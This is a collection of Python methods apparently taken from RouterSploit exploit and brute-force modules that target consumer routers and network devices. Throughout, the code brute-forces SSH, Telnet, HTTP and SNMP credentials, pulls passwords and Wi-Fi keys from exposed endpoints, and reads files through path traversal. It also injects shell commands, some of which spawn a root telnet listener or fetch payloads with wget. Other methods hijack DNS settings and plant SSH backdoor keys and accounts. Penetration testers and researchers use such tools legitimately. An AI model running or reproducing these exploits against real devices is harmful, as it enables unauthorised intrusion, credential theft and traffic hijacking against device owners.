def ftp_get_config(self): print_status("FTP {}:{} Trying FTP authentication with Username: {} and Password: {}".format(self.target, self.ftp_port, self.remote_user, self.remote_pass)) ftp = ftplib.FTP() try: ftp.connect(self.target, port=int(self.ftp_port), timeout=10) ftp.login(self.remote_user, self.remote_pass) print_success("FTP {}:{} Authentication successful".format(self.target, self.ftp_port)) if self.config_path in ftp.nlst(): print_status("FTP {}:{} Downloading: {}".format(self.target, self.ftp_port, self.config_path)) r = StringIO() ftp.retrbinary('RETR {}'.format(self.config_path), r.write) ftp.close() data = r.getvalue() creds = re.findall(r'add name=(.*) password=(.*) role=(.*) hash2=(.*) crypt=(.*)\r\n', data) if creds: print_success("Found encrypted credentials:") print_table(('Name', 'Password', 'Role', 'Hash2', 'Crypt'), *creds) return creds else: print_error("Exploit failed - could not find any credentials") except ftplib.all_errors: print_error("Exploit failed - FTP error") return None
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") self.command_loop() else: print_error("Target is not vulnerable")
def attack(self): url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) response = http_request(method="GET", url=url) if response is None: return if response.status_code != 401: print_status("Target is not protected by Basic Auth") return if self.usernames.startswith('file://'): usernames = open(self.usernames[7:], 'r') else: usernames = [self.usernames] if self.passwords.startswith('file://'): passwords = open(self.passwords[7:], 'r') else: passwords = [self.passwords] collection = LockedIterator(itertools.product(usernames, passwords)) self.run_threads(self.threads, self.target_function, collection) if len(self.credentials): print_success("Credentials found!") headers = ("Target", "Port", "Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found")
def run(self): if self.check(): print_success("Target is vulnerable") url = "{}:{}".format(self.target, self.port) print "Visit: {}/\n".format(url) else: print_error("Target seems to be not vulnerable")
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) print_status(name, 'process is starting...', verbose=module_verbosity) while running.is_set(): try: user, password = data.next() user = user.encode('utf-8').strip() password = password.encode('utf-8').strip() response = http_request(method="GET", url=url, auth=(user, password)) if response.status_code != 401: if boolify(self.stop_on_success): running.clear() print_success("Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity) self.credentials.append((self.target, self.port, user, password)) else: print_error("Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity) except StopIteration: break print_status(name, 'process is terminated.', verbose=module_verbosity)
def run(self): self.credentials = [] try: tn = telnetlib.Telnet(self.target, self.port) tn.expect(["login: "******"Login: "******"Connection error {}:{}".format(self.target, self.port)) return if self.defaults.startswith('file://'): defaults = open(self.defaults[7:], 'r') else: defaults = [self.defaults] collection = LockedIterator(defaults) self.run_threads(self.threads, self.target_function, collection) if len(self.credentials): print_success("Credentials found!") headers = ("Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found")
def run(self): rootpath = 'routersploit/modules/' path = 'exploits/dlink/' # only py exploit files modules = [f.replace(".py", "") for f in listdir(rootpath + path) if isfile(join(rootpath + path, f)) and f.endswith(".py") and f != "__init__.py"] vulns = [] for module_name in modules: f = path + module_name module = imp.load_source('module', rootpath + f + '.py') exploit = module.Exploit() exploit.target = self.target exploit.port = self.port res = exploit.check() if res is True: print_success("{} is vulnerable".format(f)) vulns.append(f) elif res is False: print_error("{} is not vulnerable".format(f)) else: print_status("{} could not be verified".format(f)) print if len(vulns): print_success("Device is vulnerable!") for v in vulns: print " - {}".format(v) else: print_error("Device is not vulnerable to any exploits!") print
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") shell(self, architecture="mipsel", method="wget", binary="wget", location="/var") else: print_error("Target is not vulnerable")
def run(self): response = self.telnet_login() if 'Login not allowed' in response and self.is_port_opened(self.ftp_port): print_error("Telnet: {}:{} Authentication through Telnet not allowed".format(self.target, self.telnet_port)) print_status("FTP and HTTP service active") creds = self.ftp_get_config() if creds: print_status("Use javascript console (through developer tools) to bypass authentication:") payload = ('var user = "******"\n' 'var hash2 = "{}";\n' 'var HA2 = MD5("GET" + ":" + uri);\n' 'document.getElementById("user").value = user;\n' 'document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);\n' 'document.authform.submit();\n') for user in creds: print_success("User: {} Role: {}".format(user[0], user[2])) print_info(payload.format(user[0], user[3])) elif '}=>' in response: print_success("Successful authentication through Telnet service") tn = telnetlib.Telnet(self.target, int(self.telnet_port), timeout=10) tn.read_until(': ') tn.write(self.remote_user + '\r\n') tn.read_until(': ') tn.write(self.remote_pass + '\r\n') tn.interact() else: print_error("Exploit failed - target seems to be not vulnerable")
def command_loop(self): while 1: cmd = raw_input("cmd > ") try: print_info(self.execute(cmd)) except socket.timeout: print_error("No response received. The exploit tends to be unstable though. It is worth trying to run the same command again.")
def run(self): if self.check(): print_success("Target is vulnerable") print "\nUse your browser:" print "{}:{}/xslt".format(self.target, self.port) else: print_error("Target seems to be not vulnerable")
def run(self): if self.check(): print_success("Target is vulnerable") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(30) s.connect((self.target, 32764)) conf = self.execute(s, 1) lines = re.split("\x00|\x01", conf) pattern = re.compile('user(name)?|password|login'); credentials = [] for line in lines: try: (var, value) = line.split("=") if len(value)>0 and pattern.search(var): credentials.append((var, value)) except ValueError: pass if len(credentials): print_table(("Parameter", "Value"), *credentials) else: print_error("Target is not vulnerable")
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name address = "{}:{}".format(self.target, self.port) print_status(name, 'thread is starting...', verbose=module_verbosity) while running.is_set(): try: string = data.next().strip() bindvariable = netsnmp.Varbind(".1.3.6.1.2.1.1.1.0") res = netsnmp.snmpget(bindvariable, Version=1, DestHost=address, Community=string) if res[0] is not None: running.clear() print_success("Target: {}:{} {}: Valid community string found - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity) self.strings.append((self.target, self.port, string)) else: print_error("Target: {}:{} {}: Invalid community string - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity) except StopIteration: break print_status(name, 'thread is terminated.', verbose=module_verbosity)
def run(self): self.credentials = [] print_status("Running module...") ssh = paramiko.SSHClient() try: ssh.connect(self.target, port=self.port) except socket.error: print_error("Connection error: %s:%s" % (self.target, str(self.port))) ssh.close() return except: pass ssh.close() if self.usernames.startswith('file://'): usernames = open(self.usernames[7:], 'r') else: usernames = [self.usernames] if self.passwords.startswith('file://'): passwords = open(self.passwords[7:], 'r') else: passwords = [self.passwords] collection = LockedIterator(itertools.product(usernames, passwords)) self.run_threads(self.threads, self.target_function, collection) if len(self.credentials): print_success("Credentials found!") headers = ("Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found")
def run(self): if self.check(): print_success("Target seems to be vulnerable") file_path = "..{}".format(self.filename) url = "{}:{}/apply.cgi".format(self.target, self.port) data = {"html_response_page": file_path, "action": "do_graph_auth", "login_name": "test", "login_pass": "******", "&login_n": "test2", "log_pass": "******", "graph_code": "63778", "session_id": "test5", "test": "test"} print_status("Sending request payload using credentials: {} / {}".format(self.username, self.password)) response = http_request(method="POST", url=url, data=data, auth=(self.username, self.password)) if response is None: return if response.status_code == 200: print_status("File: {}".format(self.filename)) print_info(response.text) else: print_error("Exploit failed - could not read response") else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): creds = [] url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port)) # print_status("Requesting for {}".format(url)) response = http_request(method="GET", url=url) if response is None: return admin = re.findall("pwdAdmin = '(.+?)'", response.text) if admin: creds.append(('admin', admin[0])) support = re.findall("pwdSupport = '(.+?)'", response.text) if support: creds.append(('support', support[0])) user = re.findall("pwdUser = '******'", response.text) if user: creds.append(('user', user[0])) if creds: print_success("Credentials found!") print_table(("Login", "Password"), *creds) else: print_error("Credentials could not be found")
def run(self): cmd = "utelnetd -l /bin/sh -p {} -d".format(self.telnetport) if self.execute1(cmd) or self.execute2(cmd): self.telnet_connect() else: print_error("Exploit failed")
def run(self): client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: client.connect(self.target, username='', allow_agent=False, look_for_keys=False) except paramiko.ssh_exception.SSHException: pass except: print_error("Exploit Failed - SSH Service is down") return trans = client.get_transport() try: trans.auth_password(username='******', password='', event=None, fallback=True) except paramiko.ssh_exception.AuthenticationException: pass except: print_status("Error with Existing Session. Wait few minutes.") return try: trans.auth_interactive(username='******', handler=self.custom_handler) print_success("Exploit succeeded") ssh_interactive(client) except: print_error("Exploit failed") return
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) headers = {u'Content-Type': u'application/x-www-form-urlencoded'} print_status(name, 'process is starting...', verbose=module_verbosity) while running.is_set(): try: line = data.next().split(":") user = line[0].strip() password = line[1].strip() postdata = self.data.replace("{{USER}}", user).replace("{{PASS}}", password) r = requests.post(url, headers=headers, data=postdata, verify=False) l = len(r.text) if l < self.invalid["min"] or l > self.invalid["max"]: running.clear() print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity) self.credentials.append((user, password)) else: print_error(name, "Authentication Failed - Username: '******' Password: '******'".format(user, password), verbose=module_verbosity) except StopIteration: break print_status(name, 'process is terminated.', verbose=module_verbosity)
def run(self): url = "{}:{}/UD/?5".format(self.target, self.port) headers = { "SOAPACTION": '"urn:dslforum-org:service:UserInterface:1#GetLoginPassword"', "Content-Type": 'text/xml; charset="utf-8"', "Expect": "100-continue", } data = ( '<?xml version="1.0"?>' '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">' "<s:Body>" '<m:GetLoginPassword xmlns:m="urn:dslforum-org:service:UserInterface:1">' "</m:GetLoginPassword>" "</s:Body>" "</s:Envelope>" ) response = http_request(method="POST", url=url, headers=headers, data=data) if response is None: return r = re.compile("<NewUserpassword>(.*?)</NewUserpassword>") m = r.search(response.text) if m: print_success("Password has been found") print_info("Password: {}".format(m.group(1))) else: print_error("Exploit failed - could not find password")
def run(self): url = sanitize_url("{}:{}/SaveCfgFile.cgi".format(self.target, self.port)) try: r = requests.get(url, verify=False) res = r.text except requests.exceptions.ConnectionError: print_error("Connection error: %s" % url) return var = ['pppoe_username', 'pppoe_password', 'wl0_pskkey', 'wl0_key1', 'mradius_password', 'mradius_secret', 'httpd_password', 'http_passwd', 'pppoe_passwd'] data = [] for v in var: regexp = '{}="(.+?)"'.format(v) val = re.findall(regexp, res) if len(val): data.append((v, val[0])) if len(data): print_success("Exploit success") headers = ("Option", "Value") print_table(headers, *data) else: print_error("Exploit failed")
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") shell(self, architecture="none", method="awk", binary="awk") else: print_error("Target is not vulnerable")
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name print_status(name, 'thread is starting...', verbose=module_verbosity) cmdGen = cmdgen.CommandGenerator() while running.is_set(): try: string = data.next().strip() errorIndication, errorStatus, errorIndex, varBinds = cmdGen.getCmd( cmdgen.CommunityData(string), cmdgen.UdpTransportTarget((self.target, int(self.port))), '1.3.6.1.2.1.1.1.0', ) if errorIndication or errorStatus: print_error("Target: {}:{} {}: Invalid community string - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity) else: if boolify(self.exit_on_success): running.clear() print_success("Target: {}:{} {}: Valid community string found - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity) self.strings.append((self.target, self.port, string)) except StopIteration: break print_status(name, 'thread is terminated.', verbose=module_verbosity)
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") shell(self, architecture="mipsbe") else: print_error("Target is not vulnerable")
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) print_status(name, 'thread is starting...', verbose=module_verbosity) while running.is_set(): try: user, password = data.next() user = user.strip() password = password.strip() ssh.connect(self.target, int(self.port), timeout=5, username=user, password=password) except StopIteration: break except paramiko.ssh_exception.SSHException as err: ssh.close() print_error("Target: {}:{} {}: {} Username: '******' Password: '******'".format(self.target, self.port, name, err, user, password), verbose=module_verbosity) else: if boolify(self.stop_on_success): running.clear() print_success("Target: {}:{} {} Authentication Succeed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity) self.credentials.append((self.target, self.port, user, password)) print_status(name, 'thread is terminated.', verbose=module_verbosity)
def execute(self, cmd): if len(cmd) > 237: print_error('Your command must be at most 237 characters long. Longer strings might crash the server.') return sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.bind(('0.0.0.0', 9999)) sock.settimeout(2) packet = (b'\x0C\x15\x33\x00'+ os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(cmd)) + cmd).ljust(512, b'\x00') try: sock.sendto(packet, (self.target, 9999)) except socket.error: return "" while True: try: data, addr = sock.recvfrom(512) except socket.timeout: sock.close() return "" if len(data) == 512 and data[1] == "\x16": break length = struct.unpack('<H', data[14:16])[0] output = data[16:16+length] sock.close() return output
def run(self): if self.check(): url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port)) print_status("Requesting for {}".format(url)) response = http_request(method="GET", url=url) if response is None: return regexps = [("admin", "pwdAdmin = '(.+?)'"), ("support", "pwdSupport = '(.+?)'"), ("user", "pwdUser = '******'")] creds = [] for regexp in regexps: res = re.findall(regexp[1], response.text) if len(res): creds.append((regexp[0], b64decode(res[0]))) if len(creds): print_success("Credentials found!") headers = ("Login", "Password") print_table(headers, *creds) print("NOTE: Admin is commonly implemented as root") else: print_error("Credentials could not be found") else: print_error("Device seems to be not vulnerable")
def run(self): url = "{}:{}/SaveCfgFile.cgi".format(self.target, self.port) response = http_request(method="GET", url=url) if response is None: return var = [ 'pppoe_username', 'pppoe_password', 'wl0_pskkey', 'wl0_key1', 'mradius_password', 'mradius_secret', 'httpd_password', 'http_passwd', 'pppoe_passwd' ] data = [] for v in var: regexp = '{}="(.+?)"'.format(v) val = re.findall(regexp, response.text) if len(val): data.append((v, val[0])) if len(data): print_success("Exploit success") headers = ("Option", "Value") print_table(headers, *data) else: print_error("Exploit failed")
def run(self): # address and parameters url = "{}:{}/cgi-bin/webproc".format(self.target, self.port) data = { "getpage": "html/index.html", "*errorpage*": "../../../../../../../../../../..{}".format(self.filename), "var%3Amenu": "setup", "var%3Apage": "connected", "var%": "", "objaction": "auth", "%3Ausername": "******", "%3Apassword": "******", "%3Aaction": "login", "%3Asessionid": "abcdefgh" } # connection response = http_request(method="POST", url=url, data=data) if response is None: return if response.status_code == 200: print_success("Exploit success") print_status("File: {}".format(self.filename)) print response.text else: print_error("Exploit failed")
def run(self): if self.check(): print_success("Target seems to be vulnerable") print_status("Invoking command loop...") shell(self, architecture="mipsle") else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(10) print_status("Sending exploit payload") sock.sendto(self.payload, (self.target, 43690)) try: print_status("Waiting for response") response = sock.recv(1024) except: print_error("Exploit failed - device seems to be not vulnerable") return if len(response): print_success("Exploit success") print_info(response)
def run(self): url = "{}:{}/error_page.htm".format(self.target, self.port) response = http_request(method="GET", url=url) if response is None: return creds = re.findall("if\('1' == '0' \|\| '(.+?)' == 'admin'\)", response.text) if len(creds): c = [("admin", creds[0])] print_success("Credentials found!") headers = ("Login", "Password") print_table(headers, *c) else: print_error("Credentials could not be found")
def run(self): if self.check(): print_success("Target seems to be vulnerable") url = "{}:{}/imc/report/DownloadReportSource?dirType=webapp&fileDir=reports&fileName=reportParaExample.xml..\..\..\..\..\..\..\..\..\..{}".format( self.target, self.port, self.filename) print_status("Sending paylaod request") response = http_request(method="GET", url=url) if response is None: return if response.status_code == 200 and len(response.text): print_success("Exploit success - reading {} file".format( self.filename)) print_info(response.text) else: print_error("Exploit failed - target seems to be not vulnerable")
def execute1(self, cmd): print_status("Trying to exploit first command injection vulnerability...") url = "{}:{}/cgi-bin/adv_remotelog.asp".format(self.target, self.port) payload = "1.1.1.1;{};#".format(cmd) data = {"RemotelogEnable": "1", "syslogServerAddr": payload, "serverPort": "514"} response = http_request(method="POST", url=url, data=data) if response is not None and response.status_code != 404: return True print_error("Exploitation failed for unauthenticated command injection") return False
def run(self): url = sanitize_url("{}:{}/login.stm".format(self.target, self.port)) response = http_request(method="GET", url=url) if response is None: return val = re.findall('password = "******"', response.text) if len(val): print_success("Exploit success") data = [('admin', val[0])] headers = ("Login", "MD5 Password") print_table(headers, *data) else: print_error("Exploit failed. Device seems to be not vulnerable.")
def run(self): if self.check(): url = "{}:{}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../..{}".format( self.target, self.port, self.filename) response = http_request(method="GET", url=url) if response is None: return if response.status_code == 200 and len(response.text): print_success("Exploit success - reading file {}".format( self.filename)) print_info(response.text) else: print_error("Exploit failed - could not read file") else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): if self.check(): url = "{}:{}/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../..{}".format( self.target, self.port, self.filename) response = http_request(method="GET", url=url) if response is None: return if response.status_code == 200 and len(response.text): print_success("Exploit success") print_status("Reading file: {}".format(self.filename)) print_info(response.text) else: print_error("Exploit failed - could not read file") else: print_error("Exploit failed - device seems to be not vulnerable")
def run(self): url = "{}:{}/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary={}&dnsSecondary={}".format(self.target, self.port, self.dns1, self.dns2) print_status("Attempting to change DNS settings...") print_status("Primary DNS: {}".format(self.dns1)) print_status("Secondary DNS: {}".format(self.dns2)) response = http_request(method="POST", url=url) if response is None: return if response.status_code == 200: print_success("DNS settings has been changed") else: print_error("Could not change DNS settings")
def run(self): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: ssh.connect(self.target, self.ssh_port, timeout=5, username=self.user, password=self.password) except (paramiko.ssh_exception.SSHException, socket.error): print_error( "Exploit failed - cannot log in with credentials {} / {}". format(self.user, self.password)) return else: print_success("SSH - Successful authentication") ssh_interactive(ssh)
def run(self): if self.check(): print_success("Target seems to be vulnerable") url = "{}:{}{}".format(self.target, self.port, self.valid) print_status("Sending request to download sensitive information") response = http_request(method="GET", url=url) if response is None: return if response.status_code == 200 and len(response.text): print_status("Reading {}".format(self.valid)) print_info(response.text) else: print_error("Exploit failed - could not retrieve response") else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): if self.check(): url = "{}:{}/cgi-bin/webproc?getpage={}&errorpage=html/main.html&var:language=en_us&var:language=en_us&var:page=BAS_bpa".format( self.target, self.port, self.filename) response = http_request(method="GET", url=url, auth=(self.username, self.password)) if response is None: return if response.status_code == 200 and len(response.text): print_success("Success! File: %s" % self.filename) print response.text else: print_error("Exploit failed") else: print_error("Device seems to be not vulnerable")
def attack(self): # todo: check if service is up if self.snmp.startswith('file://'): snmp = open(self.snmp[7:], 'r') else: snmp = [self.snmp] collection = LockedIterator(snmp) self.run_threads(self.threads, self.target_function, collection) if len(self.strings): print_success("Credentials found!") headers = ("Target", "Port", "Community Strings") print_table(headers, *self.strings) else: print_error("Valid community strings not found")
def run(self): url = "{}:{}/dnscfg.cgi?dnsPrimary={}&dnsSecondary={}&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=".format(self.target, self.port, self.dns1, self.dns2) print_status("Attempting to change DNS settings...") print_status("Primary DNS: {}".format(self.dns1)) print_status("Secondary DNS: {}".format(self.dns2)) response = http_request(method="POST", url=url) if response is None: return if response.status_code == 200: print_success("DNS settings has been changed") else: print_error("Could not change DNS settings")
def run(self): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: ssh.connect(self.target, 22, timeout=5, username=self.username, password=self.password) except: ssh.close() else: print_success("SSH - Successful authentication") cmd = "" while cmd not in ["quit", "exit"]: cmd = raw_input("> ") stdin, stdout, stderr = ssh.exec_command(cmd.strip()) print stdout.channel.recv(2048) return try: tn = telnetlib.Telnet(self.target, 23) tn.expect(["Login: "******"login: "******"\r\n") tn.expect(["Password: "******"password"], 5) tn.write(self.password + "\r\n") tn.write("\r\n") (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5) if i != -1: return False else: if any(map(lambda x: x in res, ["#", "$", ">"])): print_success("Telnet - Successful authentication") tn.write("\r\n") tn.interact() tn.close() except: print_error("Connection Error") return
def run(self): if self.device < 0 or self.device >= len(self.payloads): print_error( "Set target device - use \"show devices\" and \"set device <id>\"" ) return if self.action not in ["set", "unset"]: print_error( "Specify action: set / unset credless authentication for Telnet service" ) return print_status("Trying to connect to Telnet service on port {}".format( self.telnet_port)) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(10.0) s.connect((self.target, int(self.telnet_port))) print_status("Connection OK") print_status("Received bytes from telnet service: {}".format( repr(s.recv(1024)))) except Exception: print_error("Connection failed") return print_status("Building payload...") payload = self.build_payload() if self.action == 'set': print_status("Setting credless privilege 15 authentication") else: print_status("Unsetting credless privilege 15 authentication") print_status("Sending cluster option") s.send(payload) s.close() print_status("Payload sent") if self.action == 'set': print_status("Connecting to Telnet service...") try: t = telnetlib.Telnet(self.target, int(self.telnet_port), timeout=10) t.interact() except Exception: print_error("Exploit failed") else: print_status("Check if Telnet authentication was set back")
def login(self): url = "{}:{}/login.cgi?logout=1".format(self.target, self.port) data = {"username": self.username, "password": self.password, "target": ""} print_status("Trying to authenticate") response = http_request(method="POST", url=url, data=data, allow_redirects=False, session=self.session) if response is None: return False if response.status_code == 302 and "CGISESSID" in response.cookies.keys(): print_status("CGI Session ID: {}".format(response.cookies['CGISESSID'])) print_success("Authenticated as {}:{}".format(self.username, self.password)) return True print_error("Exploit failed. Could not authenticate.") return False
def run(self): url = "{}:{}/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd".format( self.target, self.port) response = http_request(method="GET", url=url) if response is None: return creds = re.findall( "<center>\t\t\t\n\t\t\t<table> <tr> <td>\n\t\t\t(.+?)\n\n\t\t\t</td>", response.text) if len(creds): c = creds[0].split(":") creds = [(c[0], c[1])] print_success("Credentials found!") headers = ("Login", "Password") print_table(headers, *creds) else: print_error("Credentials could not be found")
def run(self): if self.check(): print_success('Target is vulnerable') print_success('Trying to exploit by uploading SSH public key') key = paramiko.RSAKey.generate(1024) public_key = key.get_base64() private_key = StringIO.StringIO() key.write_private_key(private_key) tmp_file_pubkey = tempfile.TemporaryFile() tmp_file_pubkey.write('ssh-rsa ' + public_key) tmp_file_pubkey.seek(0) upload_params = {'file': ('../../etc/dropbear/authorized_keys', tmp_file_pubkey, {'Expect': ''})} upload_url = '{0}:{1}/login.cgi' .format(self.target, self.port) response = http_request(url=upload_url, method='POST', files=upload_params) if response is None: print_error('Something was wrong while uploading the SSH Public Key') return print_success('Appareantly the exploit worked fine') print_success('Trying to invoke a interactive SSH Shell') client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) pseudo_privkey_file = StringIO.StringIO(private_key.getvalue()) pkey = paramiko.RSAKey.from_private_key(pseudo_privkey_file) pseudo_privkey_file.close() private_key.close() ip_target = self.target.replace('https://', '') ip_target = ip_target.replace('http://', '') ip_target = ip_target.replace('/', '') client.connect(ip_target, self.ssh_port, username='******', pkey=pkey) ssh_interactive(client) else: print_error('Target is not vulnerable')
def run(self): creds = [] url = "{}:{}/s_brief.htm".format(self.target, self.port) print_status("Sending payload request") response = http_request(method="GET", url=url) if response is None: return print_status("Extracting credentials") username = re.findall('<input type="text" name="szUsername" size=16 value="(.+?)">', response.text) password = re.findall('<input type="password" name="szPassword" size=16 maxlength="16" value="(.+?)">', response.text) if len(username) and len(password): print_success("Exploit success") creds.append((username[0], password[0])) print_table(("Login", "Password"), *creds) else: print_error("Exploit failed - could not extract credentials")
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") print_status( "It is blind command injection - response is not available") if self.arch == "mipsbe": shell(self, architecture="mipsbe", method="wget", location="/tmp") elif self.arch == "mipsle": shell(self, architecture="mipsle", method="wget", location="/tmp") else: print_error("Target is not vulnerable")
def run(self): self.session = requests.Session() if self.check(): print_success("Target seems to be vulnerable") if self.login(): if not self.newusername: self.newusername = random_text(8) if not self.newpassword: self.newpassword = random_text(8) self.create_ssh_backdoor(self.newusername, self.newpassword) # Log into the SSH backdoor account self.init_ssh_session(self.newusername, self.newpassword) else: print_error("Exploit failed. Could not log in") else: print_error("Exploit failed. Target seems to be not vulnerable.")
def attack(self): url = sanitize_url("{}:{}{}".format(self.target, self.port, self.get_form_path())) try: requests.get(url, verify=False) except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema): print_error("Invalid URL format: %s" % url) return except requests.exceptions.ConnectionError: print_error("Connection error: %s" % url) return # authentication type if self.form == 'auto': form_data = self.detect_form() if form_data is None: print_error("Could not detect form") return (form_action, self.data) = form_data if form_action: self.path = form_action else: self.data = self.form print_status("Using following data: ", self.data) # invalid authentication self.invalid_auth() # running threads if self.usernames.startswith('file://'): usernames = open(self.usernames[7:], 'r') else: usernames = [self.usernames] if self.passwords.startswith('file://'): passwords = open(self.passwords[7:], 'r') else: passwords = [self.passwords] collection = LockedIterator(itertools.product(usernames, passwords)) self.run_threads(self.threads, self.target_function, collection) if len(self.credentials): print_success("Credentials found!") headers = ("Target", "Port", "Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found")
def _deobfuscate(self, config): def chain(lambdas, value): r_chain = None for l in lambdas: r_chain = value = l(value) return r_chain arr_c = [ chain([ lambda d: ord(d), lambda d: (d + ord('y')) & 0xff, lambda d: (d ^ ord('Z')) & 0xff, lambda d: (d - ord('e')) & 0xff ], t) for t in config ] arr_c_len = len(arr_c) tmp = ((arr_c[arr_c_len - 1] & 7) << 5) & 0xff for t in reversed(xrange(arr_c_len)): if t == 0: ct = chain( [lambda d: (d >> 3) & 0xff, lambda d: (d + tmp) & 0xff], arr_c[t]) else: ct = (((arr_c[t] >> 3) & 0xff) + (((arr_c[t - 1] & 0x7) << 5) & 0xff)) & 0xff arr_c[t] = ct tmp_str = "".join(map(chr, arr_c)) ret_str = "" if len(tmp_str) % 2 != 0: print_error("Config file can't be deobfuscated.") return None for i in xrange(len(tmp_str) / 2): ret_str += tmp_str[i + (len(tmp_str) / 2)] + tmp_str[i] return ret_str
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) headers = {u'Content-Type': u'application/x-www-form-urlencoded'} print_status(name, 'process is starting...', verbose=module_verbosity) while running.is_set(): try: user, password = data.next() user = user.strip() password = password.strip() postdata = self.data.replace("{{USER}}", user).replace( "{{PASS}}", password) r = requests.post(url, headers=headers, data=postdata, verify=False) l = len(r.text) if l < self.invalid["min"] or l > self.invalid["max"]: if boolify(self.stop_on_success): running.clear() print_success( "Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'" .format(self.target, self.port, name, user, password), verbose=module_verbosity) self.credentials.append( (self.target, self.port, user, password)) else: print_error( name, "Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'" .format(self.target, self.port, name, user, password), verbose=module_verbosity) except StopIteration: break print_status(name, 'process is terminated.', verbose=module_verbosity)
def test_cookie(self, cookie_int): """ Method that tests all cookies from the past to find one that is valid """ url = "{}:{}/html/tUserAccountControl.htm".format( self.target, self.port) cookies = dict(RpWebID=str(cookie_int)) try: r = http_request(method='GET', url=url, cookies=cookies, timeout=10) if ('NAME="OldPwd"' in r.text): print_success("Cookie {} is valid!".format(cookie_int)) pattern = r"NAME=\"OldPwd\" SIZE=\"12\" MAXLENGTH=\"12\" VALUE=\"([�-9]+)\"" password = re.findall(pattern, r.content)[0].replace( '&', ';&')[1:] + ";" print_success("Target password is : {}".format(password)) except Exception: print_error("Unable to connect to target")
def run(self): try: if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") print_status( "Please note that only first 256 characters of the " "output will be displayed.") shell(self, architecture="armle", method="wget", location="/tmp") else: print_error("Target is not vulnerable") except socket.error as ex: print_error( "Socket error ({ex}). It most likely means that something " "else is listening locally on port UDP:{port}. Make sure to " "kill it before running the exploit again.".format(ex=ex, port=9999))
def run(self): creds = [] url = "{}:{}/password.cgi".format(self.target, self.port) try: response = http_request(method="GET", url=url).text except AttributeError: return tokens = [("admin", r"pwdAdmin = '(.+?)'"), ("support", r"pwdSupport = '(.+?)'"), ("user", r"pwdUser = '******'")] for token in tokenize(tokens, response): creds.append((token.typ, token.value[-1])) if creds: print_success("Credentials found!") print_table(("Login", "Password"), *creds) else: print_error("Credentials could not be found")
def run(self): if self.check(): print_success("Target is vulnerable") url = "{}:{}/goform/system/GatewaySettings.bin".format( self.target, self.port) response = http_request(method="GET", url=url) if response is not None and response.status_code == 200 and "MLog" in response.text: print_status("Reading GatewaySettings.bin...") plain = self.decrypt_backup(response.text) name, pwd = self.parse_backup(plain) print_success( 'Exploit success! login: {}, password: {}'.format( name, pwd)) else: print_error("Exploit failed. Could not extract config file.") else: print_error("Target is not vulnerable")
